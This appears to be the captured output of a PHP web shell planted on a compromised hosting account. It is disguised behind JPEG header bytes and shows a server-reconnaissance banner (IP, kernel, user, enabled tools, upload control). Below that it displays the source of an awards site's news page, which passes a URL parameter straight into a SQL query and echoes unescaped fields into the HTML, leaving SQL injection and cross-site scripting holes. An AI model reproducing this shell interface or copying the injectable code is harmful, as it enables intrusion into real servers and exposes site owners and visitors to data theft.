����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����
Server IP : 162.0.232.25 / Your IP : 3.146.255.161 Web Server : LiteSpeed System : Linux premium276.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : kwacuqig ( 988) PHP Version : 8.2.26 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/kwacuqig/maso-awards.live/ |
Upload File : |
<?php include 'php/connect.php'; if (isset($_GET['id'])) { $id = $_GET['id']; $query = "SELECT `image`,`title`,`details` FROM `articles` WHERE `aid`=$id"; $run = mysqli_query($conn, $query) or die(mysqli_error($conn)); list($image, $title, $details) = mysqli_fetch_array($run); } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <title><?php echo $title; ?></title> <meta content="" name="description"> <meta content="" name="keywords"> <!-- Icons --> <link href="./assets/img/logo.png" rel="icon"> <!-- Google Fonts --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,700,700i|Raleway:300,400,500,700,800" rel="stylesheet"> <!-- Vendor CSS Files --> <link href="assets/vendor/aos/aos.css" rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet"> <link href="assets/vendor/bootstrap-icons/bootstrap-icons.css" rel="stylesheet"> <link href="assets/vendor/glightbox/css/glightbox.min.css" rel="stylesheet"> <link href="assets/vendor/swiper/swiper-bundle.min.css" rel="stylesheet"> <link rel="icon" href="./assets/img/maso.ico"> <!-- Template Main CSS File --> <link href="assets/css/style.css" rel="stylesheet"> <!--og codes--> <meta property="og:url" content="https://maso-awards.com/news-read.php?id=<?php echo $id; ?>" /> <meta property="og:type" content="website" /> <meta property="og:title" content="<?php echo $title; ?>" /> <meta property="og:image" content="https://maso-awards.live/assets/articles/<?php echo $image; ?>" /> <meta property="og:description" content="<?php echo $title; ?>" /> <meta property="fb:app_id" content="197362031139140" /> </head> <body> <!-- ======= Header ======= --> <header id="header" class="d-flex align-items-center "> <div class="container-fluid container-xxl d-flex align-items-center"> <div id="logo" class="me-auto"> <!-- Uncomment below if you prefer to use a text logo --> <!-- <h1><a href="index.html">The<span>Event</span></a></h1>--> <a href="index.html" class="scrollto"><img src="assets/img/maso.png" alt="Logo" title=""></a> </div> <nav id="navbar" class="navbar order-last order-lg-0"> <ul> <li><a class="nav-link scrollto" href="home#hero">Home</a></li> <li><a class="nav-link scrollto" href="home#about">About</a></li> <li><a class="nav-link scrollto active" href="home#hotels">News</a></li> <li><a class="nav-link scrollto" href="home#schedule">Calender</a></li> <li><a class="nav-link scrollto" href="home#venue">Venue</a></li> <li><a class="nav-link scrollto" href="home#gallery">Gallery</a></li> <li><a class="nav-link scrollto" href="home#supporters">Sponsors</a></li> <li><a class="nav-link scrollto" href="home#contact">Contact</a></li> </ul> <i class="bi bi-list mobile-nav-toggle"></i> </nav><!-- .navbar --> <a class="buy-tickets scrollto" href="vote">Vote</a> </div> </header><!-- End Header --> <!-- ======= Hero Section ======= --> <section id="hero-1"> <div class="hero-container" data-aos="zoom-in" data-aos-delay="100"> <h1 class="mb-4 pb-0">NEWS</h1> </div> </section><!-- End Hero Section --> <main id="main"> <!-- ======= News Section ======= --> <section id="news-read" class="section-with-bg my-1"> <div class="container-fluid"> <div class="row"> <div class="col"> <img src="./assets/articles/<?php echo $image; ?>" alt=""> <h3><?php echo $title; ?></h3> <hr> <p class="px-4"><?php echo $details; ?></p> </div> </div> </div> </section><!-- End News Section --> </main><!-- End #main --> <!-- ======= Footer ======= --> <footer id="footer"> <div class="footer-top"> <div class="container"> <div class="row"> <div class="col-lg-4 col-md-6 footer-links"> <h4>Useful Links</h4> <ul> <li><i class="bi bi-chevron-right"></i> <a href="#">About Us</a></li> <li><i class="bi bi-chevron-right"></i> <a href="#hotels">News</a></li> <li><i class="bi bi-chevron-right"></i> <a href="#">Nominate</a></li> <li><i class="bi bi-chevron-right"></i> <a href="#">Vote</a></li> </ul> </div> <div class="col-lg-4 col-md-6 footer-info"> <img src="assets/img/maso.png" alt="TheEvenet"> </div> <div class="col-lg-4 col-md-6 footer-contact"> <h4>Contact Us</h4> <p> Chichiri<br> Blantyre<br> Malawi <br> <strong>Phone:</strong> +265 884 08 59 95<br> <strong>Email:</strong> info@maso-awards.live<br> </p> <div class="social-links"> <a href="#" class="twitter"><i class="bi bi-twitter"></i></a> <a href="#" class="facebook"><i class="bi bi-facebook"></i></a> <a href="#" class="instagram"><i class="bi bi-instagram"></i></a> <a href="#" class="google-plus"><i class="bi bi-instagram"></i></a> <a href="#" class="linkedin"><i class="bi bi-linkedin"></i></a> </div> </div> </div> </div> </div> <div class="container"> <div class="copyright"> © Copyright <strong>MASO Awards</strong>. All Rights Reserved </div> </div> </footer><!-- End Footer --> <a href="#" class="back-to-top d-flex align-items-center justify-content-center"><i class="bi bi-arrow-up-short"></i></a> <!-- Vendor JS Files --> <script src="assets/vendor/aos/aos.js"></script> <script src="assets/vendor/bootstrap/js/bootstrap.bundle.min.js"></script> <script src="assets/vendor/glightbox/js/glightbox.min.js"></script> <script src="assets/vendor/swiper/swiper-bundle.min.js"></script> <script src="assets/vendor/php-email-form/validate.js"></script> <!-- Template Main JS File --> <script src="assets/js/main.js"></script> </body> </html>